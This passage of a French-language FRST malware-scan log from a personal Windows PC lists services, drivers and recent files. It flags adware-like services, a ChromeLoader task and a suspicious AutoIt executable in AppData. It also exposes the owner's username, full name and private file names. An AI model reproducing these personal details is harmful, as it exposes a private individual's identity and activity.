BRA Extension: (Brave Ads Resources) - C:\Users\thiba\AppData\Local\BraveSoftware\Brave-Browser\User Data\hbejpnagkgeeohiojniljejpdpojmfdp [2021-05-26]
BRA Extension: (Brave NTP Super Referrer mapping table) - C:\Users\thiba\AppData\Local\BraveSoftware\Brave-Browser\User Data\heplpbhjcbmiibdlchlanmdenffpiibo [2020-12-05]
BRA Extension: (Brave Ads Resources) - C:\Users\thiba\AppData\Local\BraveSoftware\Brave-Browser\User Data\ijgkfgmfiinppefbonemjidmkhgbonei [2021-12-23]
BRA Extension: (Brave SpeedReader Updater) - C:\Users\thiba\AppData\Local\BraveSoftware\Brave-Browser\User Data\jicbkmdloagakknpihibphagfckhjdih [2021-09-17]
BRA Extension: (Brave NTP sponsored images) - C:\Users\thiba\AppData\Local\BraveSoftware\Brave-Browser\User Data\lcenblphbmngnohghkhpojmpflebkcpd [2022-01-05]
BRA Extension: (Crypto Wallets) - C:\Users\thiba\AppData\Local\BraveSoftware\Brave-Browser\User Data\odbfpeeihdkbihmopkbjmoonfanlbfcl [2021-10-22]
BRA Extension: (Brave HTTPS Everywhere Updater) - C:\Users\thiba\AppData\Local\BraveSoftware\Brave-Browser\User Data\oofiananboodjbbmdelgdommihjbkfag [2022-01-04]

==================== Services (Avec liste blanche) ===================

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)

"SAntivirusIC" => service a été déverrouillé. <==== ATTENTION
"UsefulCaloti" => service a été déverrouillé. <==== ATTENTION

R2 AdobeUpdateService; C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [842424 2021-05-25] (Adobe Inc. -> Adobe Inc.)
R2 AGMService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe [3779840 2021-07-14] (Adobe Inc. -> Adobe Systems, Incorporated)
S2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [3547904 2021-07-14] (Adobe Inc. -> Adobe Systems, Incorporated)
S3 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [8906088 2021-09-03] (BattlEye Innovations e.K. -> )
S2 brave; C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe [163528 2020-12-05] (Brave Software, Inc. -> BraveSoftware Inc.)
S3 bravem; C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe [163528 2020-12-05] (Brave Software, Inc. -> BraveSoftware Inc.)
S3 EasyAntiCheat; C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe [812008 2021-09-28] (EasyAntiCheat Oy -> Epic Games, Inc)
S3 EpicOnlineServices; C:\Program Files (x86)\Epic Games\Epic Online Services\service\EpicOnlineServicesHost.exe [16029472 2021-10-29] (Epic Games Inc. -> Epic Games, Inc.)
S3 Origin Client Service; C:\Program Files (x86)\Origin\OriginClientService.exe [2557144 2021-08-19] (Electronic Arts, Inc. -> Electronic Arts)
R2 Origin Web Helper Service; C:\Program Files (x86)\Origin\OriginWebHelperService.exe [3475680 2021-08-19] (Electronic Arts, Inc. -> Electronic Arts)
R2 SAntivirusIC; C:\Program Files (x86)\Digital Communications\SAntivirus\SAntivirusIC.exe [6939968 2021-01-07] (Digital Communications Inc -> Сorp DCom) <==== ATTENTION
R2 SAntivirusSvc; C:\Program Files (x86)\Digital Communications\SAntivirus\SAntivirusService.exe [628032 2021-01-07] (Digital Communications Inc -> Сorp DCom) <==== ATTENTION
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [6138112 2021-12-17] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 Update service; C:\Program Files (x86)\Popcorn Time\Updater.exe [339968 2020-08-27] (Popcorn Time) [Fichier non signé]
R2 UsefulCaloti; C:\Program Files (x86)\UsefulCaloti\UsefulCaloti.exe [5733872 2018-05-04] (Apps Delivered Ltd -> Useful Caloti) [Fichier non signé] [Fichier en cours d'utilisation]
R3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\NisSrv.exe [2876152 2021-12-17] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\MsMpEng.exe [128360 2021-12-17] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 NVDisplay.ContainerLocalSystem; C:\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_b7184c0e1c94c102\Display.NvContainer\NVDisplay.Container.exe -s NVDisplay.ContainerLocalSystem -f %ProgramData%\NVIDIA\NVDisplay.ContainerLocalSystem.log -l 3 -d C:\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_b7184c0e1c94c102\Display.NvContainer\plugins\LocalSystem -r -p 30000 -cfg NVDisplay.ContainerLocalSystem\LocalSystem

===================== Pilotes (Avec liste blanche) ===================

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)

S3 ArtFiltr_Digitizer; C:\Windows\System32\drivers\ArtFiltr_Digitizer.sys [39632 2015-04-30] (Dongguan Siliten Electronics Co.,Ltd -> 0)
S3 BthA2dp; C:\Windows\System32\drivers\BthA2dp.sys [279040 2019-12-07] (Microsoft Corporation) [Fichier non signé]
S3 BthHFEnum; C:\Windows\System32\drivers\bthhfenum.sys [144896 2019-12-07] (Microsoft Corporation) [Fichier non signé]
R3 DroidCam; C:\Windows\System32\drivers\droidcam.sys [32240 2020-04-10] (Microsoft Windows Hardware Compatibility Publisher -> Dev47Apps)
R3 DroidCamVideo; C:\Windows\System32\drivers\droidcamvideo.sys [33784 2020-10-04] (Microsoft Windows Hardware Compatibility Publisher -> Windows (R) Win 7 DDK provider)
R1 TASANTIVIRUSKD; C:\Program Files (x86)\Digital Communications\SAntivirus\TASAntivirusKD.sys [85480 2021-01-07] (Digital Communications Inc -> Corp DCom) <==== ATTENTION
R3 VOICEMOD_Driver; C:\Windows\system32\drivers\vmdrv.sys [45408 2018-03-15] (Voicemod Sociedad Limitada -> Windows (R) Win 7 DDK provider)
R3 VpdHid_1; C:\Windows\System32\drivers\VpdHid_1.sys [20216 2014-11-26] (CLOUD H.Q. INVESTMENT HOLDINGS CO., LTD. -> 0)
R3 VpdHid_MouFiltr; C:\Windows\System32\drivers\VpdHid_MouFiltr.sys [7168 2014-11-26] (CLOUD H.Q. INVESTMENT HOLDINGS CO., LTD. -> 0)
S0 WdBoot; C:\Windows\System32\drivers\wd\WdBoot.sys [48536 2021-12-17] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
R0 WdFilter; C:\Windows\System32\drivers\wd\WdFilter.sys [435432 2021-12-17] (Microsoft Windows -> Microsoft Corporation)
R3 WdNisDrv; C:\Windows\System32\drivers\wd\WdNisDrv.sys [86248 2021-12-17] (Microsoft Windows -> Microsoft Corporation)

==================== NetSvcs (Avec liste blanche) ===================

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)


==================== Un mois (créés) (Avec liste blanche) =========

(Si un élément est inclus dans le fichier fixlist.txt, le fichier/dossier sera déplacé.)

2022-01-05 12:43 - 2022-01-05 12:43 - 000030265 _____ C:\Users\thiba\Desktop\FRST.txt
2022-01-05 12:42 - 2022-01-05 12:43 - 000000000 ____D C:\FRST
2022-01-05 12:39 - 2022-01-05 12:39 - 002311168 _____ (Farbar) C:\Users\thiba\Desktop\FRST64.exe
2022-01-05 11:46 - 2022-01-05 11:46 - 002242215 _____ C:\Users\thiba\Downloads\Thibaud Malarte 07.pdf
2022-01-05 02:24 - 2022-01-05 02:24 - 000000000 ___HD C:\$SysReset
2022-01-05 02:12 - 2022-01-05 02:12 - 263993944 _____ C:\Users\thiba\Downloads\zqque60h.exe
2022-01-05 02:12 - 2022-01-05 02:12 - 000000000 ____D C:\Users\thiba\Doctor Web
2022-01-05 01:43 - 2022-01-05 01:44 - 000548774 _____ C:\Users\thiba\Downloads\winupdatefix_1.3.exe
2022-01-05 01:18 - 2022-01-05 01:18 - 000000000 ____D C:\Users\thiba\AppData\LocalLow\Dinosaur Polo Club
2022-01-05 01:17 - 2022-01-05 01:17 - 000000223 _____ C:\Users\thiba\Desktop\Mini Motorways.url
2022-01-05 00:22 - 2022-01-05 00:24 - 000012806 _____ C:\Windows\system32\Tasks\ChromeLoader
2022-01-03 20:08 - 2022-01-03 20:08 - 002175226 _____ C:\Users\thiba\Desktop\Théâtre de la tragédie Shakespearienne.pdf
2022-01-03 20:05 - 2022-01-03 20:05 - 002174418 _____ C:\Users\thiba\Desktop\Malarte_Arcane Théatre de la tragédie Shakespearienne.pdf
2022-01-03 16:21 - 2022-01-03 16:21 - 000029438 _____ C:\Users\thiba\Desktop\hailee-steinfeld-ella-purnell-arcane-netflix.webp
2022-01-03 15:19 - 2022-01-03 15:19 - 000535704 _____ C:\Users\thiba\Desktop\dkpA1sdFrM8Fqn1geADl1IyTuB44kpmkr5_AQtm90To.webp
2022-01-03 14:26 - 2022-01-03 14:26 - 000022586 _____ C:\Users\thiba\Desktop\arcane-maisfontes.176c.zip
2022-01-02 12:09 - 2022-01-02 12:12 - 000000000 ____D C:\Users\thiba\Downloads\PopcornTime
2021-12-31 13:22 - 2021-12-31 13:22 - 000044362 _____ C:\Users\thiba\Desktop\Malarte_Caspratique_M2diffusioncinéma.pdf
2021-12-31 00:12 - 2021-12-31 00:12 - 000000000 _____ C:\Users\thiba\AppData\Local\curC0B2.tmp
2021-12-30 23:28 - 2021-12-30 23:28 - 000000000 _____ C:\Users\thiba\AppData\Local\curA9C9.tmp
2021-12-30 16:25 - 2022-01-04 01:04 - 000000000 ____D C:\Users\thiba\Documents\The Witcher 3
2021-12-27 11:26 - 2021-12-27 11:26 - 000004036 _____ C:\Windows\system32\Tasks\PostponeDeviceSetupToast_S-1-5-21-756262882-3244545598-4113336910-1001_0
2021-12-26 22:53 - 2021-12-26 22:56 - 000000000 ____D C:\Users\thiba\Documents\Assassin's Creed Odyssey
2021-12-26 22:41 - 2021-12-26 22:41 - 000000000 ____D C:\ProgramData\Ubisoft
2021-12-26 22:40 - 2021-12-26 23:11 - 000000000 ____D C:\Users\thiba\AppData\Local\Ubisoft Game Launcher
2021-12-26 22:40 - 2021-12-26 22:41 - 000001306 _____ C:\Users\thiba\Desktop\Ubisoft Connect.lnk
2021-12-26 22:40 - 2021-12-26 22:41 - 000000000 ____D C:\Users\thiba\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Ubisoft
2021-12-26 22:40 - 2021-12-26 22:40 - 000000000 ____D C:\Program Files (x86)\Ubisoft
2021-12-26 21:25 - 2021-12-26 21:25 - 000000188 _____ C:\Users\thiba\AppData\Local\kritadisplayrc
2021-12-26 21:25 - 2021-10-30 23:59 - 004396658 _____ C:\Users\thiba\Desktop\affiche.jpeg~
2021-12-26 16:29 - 2021-12-26 16:29 - 009002851 _____ C:\Users\thiba\Desktop\wetransfer_petite-_-version-du-24-12-jpg_2021-12-24_1331.zip
2021-12-23 15:49 - 2021-12-23 15:49 - 000044776 _____ C:\Users\thiba\Desktop\Jumanji-Robin.webp
2021-12-23 15:49 - 2021-12-23 15:49 - 000009128 _____ C:\Users\thiba\Desktop\Jumanji-1995-Judy-Sarah-Alan-et-Peter-Peur.webp
2021-12-23 15:49 - 2021-12-23 15:49 - 000009038 _____ C:\Users\thiba\Desktop\Jumanji-1995-Judy-Peter-et-Alan.webp
2021-12-22 12:51 - 2021-12-22 12:51 - 000000222 _____ C:\Users\thiba\Desktop\Assassin's Creed Odyssey.url
2021-12-21 18:39 - 2021-12-21 18:39 - 000000222 _____ C:\Users\thiba\Desktop\Don't Starve Together.url
2021-12-17 17:39 - 2021-12-17 17:39 - 000090882 _____ C:\Users\thiba\Desktop\Miramax _ courtesy Everett Collection.webp
2021-12-17 16:21 - 2021-12-17 16:21 - 012752225 _____ C:\Users\thiba\Desktop\R.A.S. Trailer.mp4
2021-12-17 15:39 - 2021-12-17 15:39 - 041751085 _____ C:\Users\thiba\Desktop\5ans.mp4
2021-12-17 15:23 - 2021-12-17 15:24 - 1285371704 _____ C:\Users\thiba\Desktop\5 ANS APRES LA GUERRE - H264 FR.mp4
2021-12-17 15:22 - 2021-12-17 15:22 - 000006506 _____ C:\Users\thiba\Desktop\Sans titre.prproj
2021-12-17 11:09 - 2021-12-17 11:09 - 035011911 _____ C:\Users\thiba\Desktop\tik chik.mp4
2021-12-17 11:09 - 2021-12-17 11:09 - 000000000 _____ C:\Users\thiba\Desktop\tik chik.mp4._00_
2021-12-17 11:02 - 2021-12-17 11:02 - 107942746 _____ C:\Users\thiba\Desktop\tiktok chiken.avi
2021-12-17 10:28 - 2021-12-17 10:28 - 000006504 _____ C:\Users\thiba\Desktop\chiken.prproj
2021-12-17 10:25 - 2021-12-17 10:25 - 715950826 _____ C:\Users\thiba\Desktop\COTD_H264_24IPS_1920X1080P_AMERICAN_STANDARD_1_85.mp4
2021-12-17 10:03 - 2021-12-17 10:03 - 000000000 ____D C:\Windows\SystemTemp
2021-12-17 09:55 - 2021-12-17 09:55 - 000272384 _____ C:\Windows\system32\TpmTool.exe
2021-12-17 09:55 - 2021-12-17 09:55 - 000223744 _____ C:\Windows\SysWOW64\TpmTool.exe
2021-12-17 09:55 - 2021-12-17 09:55 - 000162816 _____ C:\Windows\system32\DataStoreCacheDumpTool.exe
2021-12-17 09:55 - 2021-12-17 09:55 - 000011979 _____ C:\Windows\system32\DrtmAuthTxt.wim
2021-12-17 09:40 - 2021-12-17 09:40 - 000000000 ___HD C:\$WinREAgent
2021-12-17 01:06 - 2021-12-17 01:06 - 000000000 ____D C:\Users\thiba\AppData\Local\mod.io
2021-12-17 01:06 - 2021-12-17 01:06 - 000000000 ____D C:\Users\Public\mod.io
2021-12-17 01:04 - 2021-12-17 01:04 - 000000222 _____ C:\Users\thiba\Desktop\Deep Rock Galactic.url
2021-12-16 19:02 - 2021-12-16 19:02 - 000000222 _____ C:\Users\thiba\Desktop\Darksburg.url
2021-12-16 18:03 - 2021-12-16 18:03 - 000237739 _____ C:\Users\thiba\Desktop\votes.aep
2021-12-16 17:57 - 2021-12-16 17:57 - 429012920 _____ C:\Users\thiba\Desktop\Composition 1_2.avi
2021-12-16 17:57 - 2021-12-16 17:57 - 004257822 _____ C:\Users\thiba\Desktop\Composition 1_2.mp4
2021-12-16 17:55 - 2021-12-16 17:56 - 684017536 _____ C:\Users\thiba\Desktop\Composition 1.avi
2021-12-12 23:02 - 2021-12-12 23:02 - 000007639 _____ C:\Users\thiba\Desktop\Budget prévisionel.xlsx
2021-12-12 22:58 - 2021-12-12 22:58 - 000095674 _____ C:\Users\thiba\Desktop\budget-fsdie-7auprogramme.pdf
2021-12-12 22:56 - 2021-12-12 22:56 - 000003588 _____ C:\Windows\system32\Tasks\OneDrive Reporting Task-S-1-5-21-756262882-3244545598-4113336910-1001
2021-12-10 17:39 - 2021-12-10 17:39 - 004183681 _____ C:\Users\thiba\Desktop\annonce 17 decembre.mp4
2021-12-10 17:35 - 2021-12-10 17:36 - 000000000 ____D C:\Users\thiba\Desktop\Enregistrement automatique Adobe After Effects
2021-12-10 17:35 - 2021-12-10 17:35 - 000000000 ____D C:\Users\thiba\Desktop\Comptes rendus Projet sans titre.aep
2021-12-10 14:49 - 2021-12-10 14:49 - 048230765 _____ C:\Users\thiba\Desktop\annonce selections.ai
2021-12-10 10:21 - 2021-12-17 11:12 - 000000000 ____D C:\Users\thiba\Desktop\Adobe Premiere Pro Auto-Save
2021-12-10 10:18 - 2021-12-10 10:18 - 001948144 _____ C:\Users\thiba\Desktop\Laurels_INTER_2022.zip
2021-12-10 10:13 - 2021-12-10 10:05 - 027172111 _____ C:\Users\thiba\Desktop\MandenOgHovedet_teaserTrailer - Copie.mp4
2021-12-10 10:07 - 2021-12-10 10:07 - 000006512 _____ C:\Users\thiba\Desktop\manandthehead.prproj
2021-12-10 10:05 - 2021-12-10 10:05 - 027172111 _____ C:\Users\thiba\Desktop\MandenOgHovedet_teaserTrailer.mp4
2021-12-09 16:48 - 2021-12-10 16:28 - 001394752 _____ C:\Users\thiba\Desktop\LAURIERS 2022Labo.ai
2021-12-09 16:20 - 2021-12-09 16:20 - 005358985 _____ C:\Users\thiba\Desktop\Laurels.zip
2021-12-09 15:48 - 2021-12-09 15:48 - 003334997 _____ C:\Users\thiba\Desktop\Composition 2_1.mp4
2021-12-09 15:30 - 2021-12-09 15:30 - 312011360 _____ C:\Users\thiba\Desktop\Composition 2_1.avi
2021-12-09 15:29 - 2021-12-09 15:29 - 1149573392 _____ C:\Users\thiba\Desktop\870x489_festival-begles.avi
2021-12-09 15:03 - 2021-12-09 15:03 - 534014320 _____ C:\Users\thiba\Desktop\Composition 2.avi
2021-12-09 14:58 - 2021-12-09 14:58 - 000051596 _____ C:\Users\thiba\Desktop\fac3a7ade.webp
2021-12-09 13:48 - 2021-12-09 13:48 - 534014320 _____ C:\Users\thiba\Desktop\annonce 17 decembre.avi
2021-12-09 13:46 - 2021-12-09 13:46 - 000014694 _____ C:\Users\thiba\Desktop\annonce plan cul_1.prproj
2021-12-09 13:45 - 2021-12-09 13:45 - 000010058 _____ C:\Users\thiba\Desktop\annonce plan cul.prproj
2021-12-09 12:03 - 2021-12-09 12:03 - 000001725 _____ C:\Users\thiba\Desktop\invite.ics
2021-12-09 10:57 - 2021-12-09 10:57 - 000038220 _____ C:\Users\thiba\Desktop\AntiqueOlive.otf

==================== Un mois (modifiés) ==================

(Si un élément est inclus dans le fichier fixlist.txt, le fichier/dossier sera déplacé.)

2022-01-05 12:42 - 2019-12-07 10:14 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2022-01-05 12:25 - 2020-12-05 15:30 - 000000000 ____D C:\ProgramData\NVIDIA
2022-01-05 11:24 - 2021-02-03 19:11 - 000000000 ____D C:\Program Files\CCleaner
2022-01-05 11:24 - 2021-01-29 13:59 - 000000000 ____D C:\Users\thiba\Downloads\Druide_Téléchargement
2022-01-05 03:15 - 2019-12-07 10:03 - 000000000 ____D C:\Windows\CbsTemp
2022-01-05 03:12 - 2020-12-05 15:47 - 137938848 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe
2022-01-05 02:58 - 2020-09-27 08:34 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2022-01-05 02:58 - 2020-09-27 06:33 - 000008192 ___SH C:\DumpStack.log.tmp
2022-01-05 02:57 - 2019-12-07 10:03 - 000524288 _____ C:\Windows\system32\config\BBI
2022-01-05 02:53 - 2021-10-23 20:38 - 000000000 ____D C:\Program Files (x86)\Steam
2022-01-05 02:53 - 2020-12-05 15:36 - 000000000 ____D C:\Users\thiba\AppData\Roaming\discord
2022-01-05 02:53 - 2020-12-05 14:52 - 000000000 ____D C:\Users\thiba
2022-01-05 02:46 - 2020-12-05 15:36 - 000000000 ____D C:\Users\thiba\AppData\Local\Discord
2022-01-05 01:49 - 2020-12-05 14:54 - 001771354 _____ C:\Windows\system32\PerfStringBackup.INI
2022-01-05 01:49 - 2019-12-07 15:50 - 000791866 _____ C:\Windows\system32\perfh00C.dat
2022-01-05 01:49 - 2019-12-07 15:50 - 000150032 _____ C:\Windows\system32\perfc00C.dat
2022-01-05 01:49 - 2019-12-07 10:13 - 000000000 ____D C:\Windows\INF
2022-01-05 01:17 - 2020-12-05 16:51 - 000000000 ____D C:\Users\thiba\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2022-01-05 01:04 - 2019-12-07 10:14 - 000000000 ____D C:\Windows\AppReadiness
2022-01-05 01:01 - 2021-08-26 11:09 - 000000000 ____D C:\Users\thiba\AppData\Roaming\uTorrent
2022-01-05 00:58 - 2021-06-08 23:41 - 000000000 ____D C:\Windows\Minidump
2022-01-05 00:58 - 2020-12-06 09:58 - 000000000 ____D C:\Users\thiba\AppData\Local\CrashDumps
2022-01-05 00:58 - 2019-12-07 10:14 - 000000000 ___HD C:\Program Files\WindowsApps
2022-01-05 00:55 - 2020-09-27 06:33 - 000000000 ____D C:\Windows\system32\SleepStudy
2022-01-05 00:32 - 2021-11-03 19:48 - 000000000 ____D C:\Users\thiba\AppData\Local\Battle.net
2022-01-04 20:40 - 2020-12-10 14:54 - 000000288 _____ C:\ProgramData\droidcam-client-options-v1
2022-01-04 20:40 - 2020-12-10 14:54 - 000000098 _____ C:\ProgramData\droidcam-settings
2022-01-04 17:35 - 2020-12-05 16:36 - 000000000 ____D C:\ProgramData\Riot Games
2022-01-04 17:05 - 2021-01-07 19:05 - 000004236 _____ C:\Windows\system32\Tasks\Opera scheduled Autoupdate 1610042734
2022-01-04 17:05 - 2021-01-07 19:05 - 000001405 _____ C:\Users\thiba\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Navigateur Opera.lnk
2021-12-30 14:32 - 2021-03-05 11:53 - 000000000 ___HD C:\Users\Public\Documents\AdobeGCData
2021-12-26 22:53 - 2020-12-07 16:40 - 000000000 ____D C:\Users\thiba\AppData\Local\D3DSCache
2021-12-26 21:25 - 2021-10-30 23:59 - 005857483 _____ C:\Users\thiba\Desktop\affiche.jpeg
2021-12-26 21:25 - 2020-12-08 13:04 - 000030194 _____ C:\Users\thiba\AppData\Local\kritarc
2021-12-26 14:30 - 2021-02-03 19:11 - 000004210 _____ C:\Windows\system32\Tasks\CCleaner Update
2021-12-22 12:58 - 2021-11-03 19:49 - 000000000 ____D C:\Program Files (x86)\Hearthstone
2021-12-22 10:44 - 2019-12-07 10:14 - 000000000 ____D C:\Windows\LiveKernelReports
2021-12-21 09:52 - 2020-09-27 08:36 - 000002442 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
2021-12-17 15:24 - 2020-12-10 19:02 - 000000000 ____D C:\Users\thiba\AppData\Roaming\vlc
2021-12-17 10:06 - 2021-11-03 19:47 - 000000000 ____D C:\Program Files (x86)\Battle.net
2021-12-17 10:04 - 2020-09-27 06:33 - 000408928 _____ C:\Windows\system32\FNTCACHE.DAT
2021-12-17 10:03 - 2019-12-07 15:53 - 000000000 ____D C:\Program Files\Windows Defender Advanced Threat Protection
2021-12-17 10:03 - 2019-12-07 10:14 - 000000000 ___RD C:\Windows\ImmersiveControlPanel
2021-12-17 10:03 - 2019-12-07 10:14 - 000000000 ____D C:\Windows\SystemResources
2021-12-17 10:03 - 2019-12-07 10:14 - 000000000 ____D C:\Windows\system32\setup
2021-12-17 10:03 - 2019-12-07 10:14 - 000000000 ____D C:\Windows\system32\oobe
2021-12-17 10:03 - 2019-12-07 10:14 - 000000000 ____D C:\Windows\system32\lv-LV
2021-12-17 10:03 - 2019-12-07 10:14 - 000000000 ____D C:\Windows\system32\lt-LT
2021-12-17 10:03 - 2019-12-07 10:14 - 000000000 ____D C:\Windows\system32\et-EE
2021-12-17 10:03 - 2019-12-07 10:14 - 000000000 ____D C:\Windows\system32\es-MX
2021-12-17 10:03 - 2019-12-07 10:14 - 000000000 ____D C:\Windows\Provisioning
2021-12-17 10:03 - 2019-12-07 10:14 - 000000000 ____D C:\Windows\PolicyDefinitions
2021-12-17 10:03 - 2019-12-07 10:14 - 000000000 ____D C:\Windows\bcastdvr
2021-12-17 09:46 - 2020-09-27 08:34 - 000000000 ____D C:\Windows\system32\Drivers\wd
2021-12-17 09:39 - 2020-12-05 15:47 - 000000000 ____D C:\Windows\system32\MRT
2021-12-15 11:25 - 2020-12-05 15:24 - 000002362 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Brave.lnk
2021-12-15 11:25 - 2020-12-05 15:24 - 000002321 _____ C:\Users\Public\Desktop\Brave.lnk
2021-12-14 21:44 - 2020-12-05 16:06 - 000000000 ____D C:\Users\thiba\AppData\Local\NVIDIA Corporation
2021-12-14 01:54 - 2021-02-17 10:44 - 000000000 ____D C:\Users\thiba\Desktop\dessins twitch
2021-12-12 22:56 - 2020-12-05 14:56 - 000003378 _____ C:\Windows\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-756262882-3244545598-4113336910-1001
2021-12-12 22:56 - 2020-12-05 14:52 - 000002417 _____ C:\Users\thiba\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2021-12-12 11:44 - 2021-12-04 21:13 - 000000000 ____D C:\Users\thiba\AppData\Roaming\EasyAntiCheat
2021-12-10 11:10 - 2021-11-26 09:18 - 009769077 _____ C:\Users\thiba\Desktop\post insta19 11 2021 (1).ai
2021-12-09 13:48 - 2021-03-05 12:55 - 000000000 ____D C:\Users\thiba\Documents\Adobe
2021-12-09 12:48 - 2021-03-23 14:08 - 000001604 _____ C:\Users\thiba\Desktop\AfterFX - Raccourci.lnk
2021-12-09 09:43 - 2020-09-27 08:36 - 000003634 _____ C:\Windows\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA
2021-12-09 09:43 - 2020-09-27 08:36 - 000003510 _____ C:\Windows\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore

==================== Fichiers à la racine de certains dossiers ========

2021-09-16 22:33 - 2021-09-16 22:33 - 001125656 _____ () C:\Users\thiba\AppData\Roaming\Detto.swf
2021-09-16 22:33 - 2021-09-16 22:33 - 000000483 _____ () C:\Users\thiba\AppData\Roaming\Disegnata.swf
2021-09-16 22:33 - 2021-09-16 22:33 - 000003073 _____ () C:\Users\thiba\AppData\Roaming\Esistenza.swf
2021-09-16 22:33 - 2021-09-16 22:33 - 000893731 _____ () C:\Users\thiba\AppData\Roaming\Mio.swf
2021-09-17 23:30 - 2021-09-17 23:30 - 000893608 _____ (AutoIt Team) C:\Users\thiba\AppData\Roaming\Passaggio.exe.com
2021-10-02 12:50 - 2021-11-04 15:25 - 000000385 _____ () C:\Users\thiba\AppData\Roaming\t2gp_installer_shared.json
2021-04-08 15:47 - 2021-04-08 16:00 - 000001456 _____ () C:\Users\thiba\AppData\Local\Adobe Enregistrer pour le Web 13.0 Prefs
2021-01-13 13:00 - 2021-01-13 13:00 - 000000000 _____ () C:\Users\thiba\AppData\Local\BIT969E.tmp
2021-01-28 13:59 - 2021-01-28 13:59 - 000000000 _____ () C:\Users\thiba\AppData\Local\BITB643.tmp
2021-11-01 12:31 - 2021-11-01 12:31 - 000012350 _____ () C:\Users\thiba\AppData\Local\cur1063.tmp
2021-04-25 20:27 - 2021-04-25 20:27 - 000000000 _____ () C:\Users\thiba\AppData\Local\cur3075.tmp
2021-05-06 22:17 - 2021-05-06 22:17 - 000000000 _____ () C:\Users\thiba\AppData\Local\cur5A2C.tmp
2021-06-08 21:21 - 2021-06-08 21:21 - 000000000 _____ () C:\Users\thiba\AppData\Local\cur8436.tmp
2021-07-05 23:08 - 2021-07-05 23:08 - 000012350 _____ () C:\Users\thiba\AppData\Local\cur8F9F.tmp
2021-06-03 18:23 - 2021-06-03 18:23 - 000000000 _____ () C:\Users\thiba\AppData\Local\cur9392.tmp
2021-05-06 20:49 - 2021-05-06 20:49 - 000000000 _____ () C:\Users\thiba\AppData\Local\cur9907.tmp
2021-05-11 17:06 - 2021-05-11 17:06 - 000000000 _____ () C:\Users\thiba\AppData\Local\cur9C5F.tmp
2021-12-30 23:28 - 2021-12-30 23:28 - 000000000 _____ () C:\Users\thiba\AppData\Local\curA9C9.tmp
2021-07-05 21:55 - 2021-07-05 21:55 - 000000000 _____ () C:\Users\thiba\AppData\Local\curB9A4.tmp
2021-12-31 00:12 - 2021-12-31 00:12 - 000000000 _____ () C:\Users\thiba\AppData\Local\curC0B2.tmp
2021-05-06 22:18 - 2021-05-06 22:18 - 000012350 _____ () C:\Users\thiba\AppData\Local\curCF13.tmp
2020-12-08 13:04 - 2021-12-26 21:23 - 000002846 _____ () C:\Users\thiba\AppData\Local\krita-sysinfo.log
2020-12-08 13:04 - 2021-12-26 21:25 - 001945126 _____ () C:\Users\thiba\AppData\Local\krita.log
2020-12-15 17:12 - 2021-12-05 23:40 - 000346142 _____ () C:\Users\thiba\AppData\Local\kritacrash.log
2021-12-26 21:25 - 2021-12-26 21:25 - 000000188 _____ () C:\Users\thiba\AppData\Local\kritadisplayrc
2020-12-08 13:04 - 2021-12-26 21:25 - 000030194 _____ () C:\Users\thiba\AppData\Local\kritarc
2021-07-14 16:55 - 2021-11-08 14:43 - 000000092 _____ () C:\Users\thiba\AppData\Local\kritashortcutsrc
2021-03-05 12:49 - 2021-03-05 12:49 - 000000000 _____ () C:\Users\thiba\AppData\Local\oobelibMkey.log
2021-01-07 19:04 - 2021-01-07 19:04 - 000016438 _____ () C:\Users\thiba\AppData\Local\partner.bmp
2021-10-02 14:29 - 2021-10-02 14:29 - 000000000 _____ () C:\Users\thiba\AppData\Local\{4494CB3D-2AFB-4890-AA43-CD756541CAFE}

==================== SigCheck ============================

(Il n'y a pas de correction automatique pour les fichiers qui ne satisfont pas à la vérification.)

==================== Fin de FRST.txt ========================